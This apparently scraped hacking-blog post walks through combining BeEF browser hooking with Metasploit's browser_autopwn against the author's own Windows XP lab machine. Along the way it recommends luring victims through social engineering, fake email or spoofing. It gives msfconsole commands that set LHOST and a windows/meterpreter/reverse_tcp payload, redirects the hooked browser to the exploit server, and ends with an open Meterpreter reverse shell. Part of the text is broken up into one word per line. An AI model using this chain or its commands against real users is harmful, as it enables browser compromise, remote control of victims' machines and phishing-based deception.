Exploit Combo Beef It
Exploit Combo Beef It
In this post I'll try to combine BeeF and Metasploit to create an Attack. BeeF, browser exploitation framework is a great tool to exploit the XSS Vulnerability on a site. My target for the attack is still my XP SP3 Machine. Lets get started.. >:) - First, start your BeeF-ng services..
on
our
backtrack.
The
address
is
- Ok, next is send a link contain the hook.js file to the victim. Lets say, using social engineering or the other technique like fake email or spoofing, I was able to make my victim visit the malicious link. I will just use the demo site provided by BeeF.
- After the victim visit the link, it will appear on the "hooked browsers" section on the BeeF control panel.
- We will use the auxiliary/server/browser_autopwn to attack our victim. Setup the msfconsole as follows. msf > use auxiliary/server/browser_autopwn msf auxiliary(browser_autopwn) > set LHOST 192.168.56.1 msf auxiliary(browser_autopwn) > set PAYLOAD_WIN32 windows/meterpreter/reverse_tcp PAYLOAD_WIN32 => windows/meterpreter/reverse_tcp
PAYLOAD_JAVA
- Type 'exploit' to start the browser_autopwn server. Wait until it finished loading all exploit.
- We must redirect the browsers victim to our address where the metasploit browser_autopwn is waiting. In my case will be 192.168.56.1:8080/JuwbJrk - Back to the BeeF control panel, go to commands>browser>site redirect
- Execute..
- A meterpreter sessions is oppened.. :D - To see the list of opened sessions type "sessions -l"
- Owned.. >:D Combo exploitation successfull.. Still have to train my attack vector though, this is not enough.. :) "the quieter you become, the more you are able to hear.." Read more: http://scx010c075.blogspot.com/2012/02/exploit-combo-beefmetasploit.html#ixzz1uGXSzCsp